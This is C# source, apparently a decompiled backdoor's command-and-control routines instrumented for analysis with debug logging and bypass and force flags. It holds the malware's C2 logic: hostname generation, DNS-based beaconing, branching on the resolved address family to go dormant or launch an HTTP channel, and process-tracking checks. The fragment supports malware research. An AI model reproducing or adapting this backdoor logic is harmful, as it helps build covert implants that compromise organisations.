private static bool UpdateNotification()
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entered UpdateNotification()");
int num = 3;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification is done " + num + "times");
while (num-- > 0)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification round" + num);
Utilities.DelayMin(0, 0);
if (ProcessTracker.TrackProcesses(true))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor TrackProcesses() complete and check now returns false");
return(false);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor CheckServerConnection() to the Internet (Actually it just checks if it can resolve)");
if (DnsHelper.CheckServerConnection(Settings.fakehost) || bypassw)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor CheckServerConnection() passed.");
return(true);
}
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - CheckServerConnection() failed unable to resolve: " + Settings.fakehost + " [Maybe use -a host] or [-w to bypass check]");
return(false);
}
public static AddressFamilyEx GetAddressFamily(string hostName, DnsRecords rec)
{
rec.cname = null;
try
{
IPHostEntry iphostEntry = DnsHelper.GetIPHostEntry(hostName);
if (iphostEntry == null)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to get IP addresses for " + hostName);
return(AddressFamilyEx.Error);
}
IPAddress[] addressList = iphostEntry.AddressList;
int i = 0;
while (i < addressList.Length)
{
IPAddress ipaddress = addressList[i];
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Ip address resolved for " + hostName + " " + ipaddress);
if (ipaddress.AddressFamily == AddressFamily.InterNetwork)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is InterNetwork");
if (!(iphostEntry.HostName != hostName) || string.IsNullOrEmpty(iphostEntry.HostName))
{
IPAddressesHelper.GetAddresses(ipaddress, rec);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Geting addresses for " + ipaddress + "Rec" + rec);
return(IPAddressesHelper.GetAddressFamily(ipaddress, out rec.dnssec));
}
rec.cname = iphostEntry.HostName;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Rec.cname is now " + iphostEntry.HostName);
if (IPAddressesHelper.GetAddressFamily(ipaddress) == AddressFamilyEx.Atm)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is InterNetwork");
return(AddressFamilyEx.Atm);
}
if (rec.dnssec)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - rec.DNSSEC is true");
rec.dnssec = false;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is Netbios");
return(AddressFamilyEx.NetBios);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to identify address family");
return(AddressFamilyEx.Error);
}
else
{
i++;
}
}
return(AddressFamilyEx.Unknown);
}
catch (Exception)
{
}
return(AddressFamilyEx.Error);
}
public static bool CheckServerConnection(string hostName)
{
try
{
IPHostEntry iphostEntry = DnsHelper.GetIPHostEntry(hostName);
if (iphostEntry != null)
{
IPAddress[] addressList = iphostEntry.AddressList;
for (int i = 0; i < addressList.Length; i++)
{
AddressFamilyEx addressFamily = IPAddressesHelper.GetAddressFamily(addressList[i]);
if (addressFamily != AddressFamilyEx.Error && addressFamily != AddressFamilyEx.Atm)
{
return(true);
}
}
}
}
catch (Exception)
{
}
return(false);
}
private static void Update()
{
bool flag = false;
CryptoHelper cryptoHelper = new CryptoHelper(userId, domain4);
HttpHelper httpHelper = null;
Thread thread = null;
bool flag2 = true;
AddressFamilyEx addressFamilyEx = AddressFamilyEx.Unknown;
int num = 0;
bool flag3 = true;
DnsRecords dnsRecords = new DnsRecords();
Random random = new Random();
int a = 0;
if (!UpdateNotification())
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() failed.");
return;
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() complete.");
Settings.svcListModified2 = false;
int num2 = 1;
while (num2 <= 3 && !flag)
{
Utilities.DelayMin(dnsRecords.A, dnsRecords.A);
if (!ProcessTracker.TrackProcesses(true))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - TrackProcesses() complete.");
if (Settings.svcListModified1)
{
flag3 = true;
}
num = (Settings.svcListModified2 ? (num + 1) : 0);
string hostName;
if (status == ReportStatus.New)
{
hostName = ((addressFamilyEx == AddressFamilyEx.Error) ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out flag2));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
else
{
if (status != ReportStatus.Append)
{
break;
}
hostName = (flag3 ? cryptoHelper.GetNextStringEx(dnsRecords.dnssec) : cryptoHelper.GetNextString(dnsRecords.dnssec));
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
}
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor is pulling the dnsRecords of C2: " + dnsRecords);
if (bypassn)
{
hostName = Settings.fakehost;
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Bypassing original C2 hostname and instead will be using " + hostName);
}
addressFamilyEx = DnsHelper.GetAddressFamily(hostName, dnsRecords);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - AddressFamily is (-1 Netbios, -2 ImpLink, -3 Atm, -4 Ipx, -5 InterNetwork, -6 InterNetworkV6, -7 Unknown, -8 Error) : " + addressFamilyEx + " [-1-8 to force Family]");
if (forcea)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Netbios family");
addressFamilyEx = AddressFamilyEx.NetBios;
dnsRecords.cname = Settings.fakehost;
}
if (forceb)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing ImpLink family");
addressFamilyEx = AddressFamilyEx.ImpLink;
}
if (forcec)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Atm family");
addressFamilyEx = AddressFamilyEx.Atm;
}
if (forced)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Ipx family");
addressFamilyEx = AddressFamilyEx.Ipx;
}
if (forcee)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetwork family");
addressFamilyEx = AddressFamilyEx.InterNetwork;
}
if (forcef)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetworkV6 family");
addressFamilyEx = AddressFamilyEx.InterNetworkV6;
}
if (forceg)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Unknown family");
addressFamilyEx = AddressFamilyEx.Unknown;
}
if (forceh)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Error family");
addressFamilyEx = AddressFamilyEx.Error;
}
switch (addressFamilyEx)
{
case AddressFamilyEx.NetBios:
if (status == ReportStatus.Append)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is APPEND");
flag3 = false;
if (dnsRecords.dnssec)
{
a = dnsRecords.A;
dnsRecords.A = random.Next(1, 3);
}
}
if (status == ReportStatus.New && flag2)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is NEW");
status = ReportStatus.Append;
ConfigManager.WriteReportStatus(status);
}
if (!string.IsNullOrEmpty(dnsRecords.cname))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - HTTPHELPER");
dnsRecords.A = a;
HttpHelper.Close(httpHelper, thread);
httpHelper = new HttpHelper(userId, dnsRecords);
if (!Settings.svcListModified2 || num > 1)
{
Settings.svcListModified2 = false;
thread = new Thread(new ThreadStart(httpHelper.Initialize))
{
IsBackground = true
};
thread.Start();
}
}
num2 = 0;
break;
case AddressFamilyEx.ImpLink:
case AddressFamilyEx.Atm:
ConfigManager.WriteReportStatus(ReportStatus.Truncate);
ProcessTracker.SetAutomaticMode();
flag = true;
break;
case AddressFamilyEx.Ipx:
if (status == ReportStatus.Append)
{
ConfigManager.WriteReportStatus(ReportStatus.New);
}
flag = true;
break;
case AddressFamilyEx.InterNetwork:
case AddressFamilyEx.InterNetworkV6:
case AddressFamilyEx.Unknown:
goto IL_1F7;
case AddressFamilyEx.Error:
dnsRecords.A = random.Next(420, 540);
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Random dnsRecord generated.");
break;
default:
goto IL_1F7;
}
IL_1F9:
num2++;
continue;
IL_1F7:
flag = true;
goto IL_1F9;
}
break;
}
HttpHelper.Close(httpHelper, thread);
}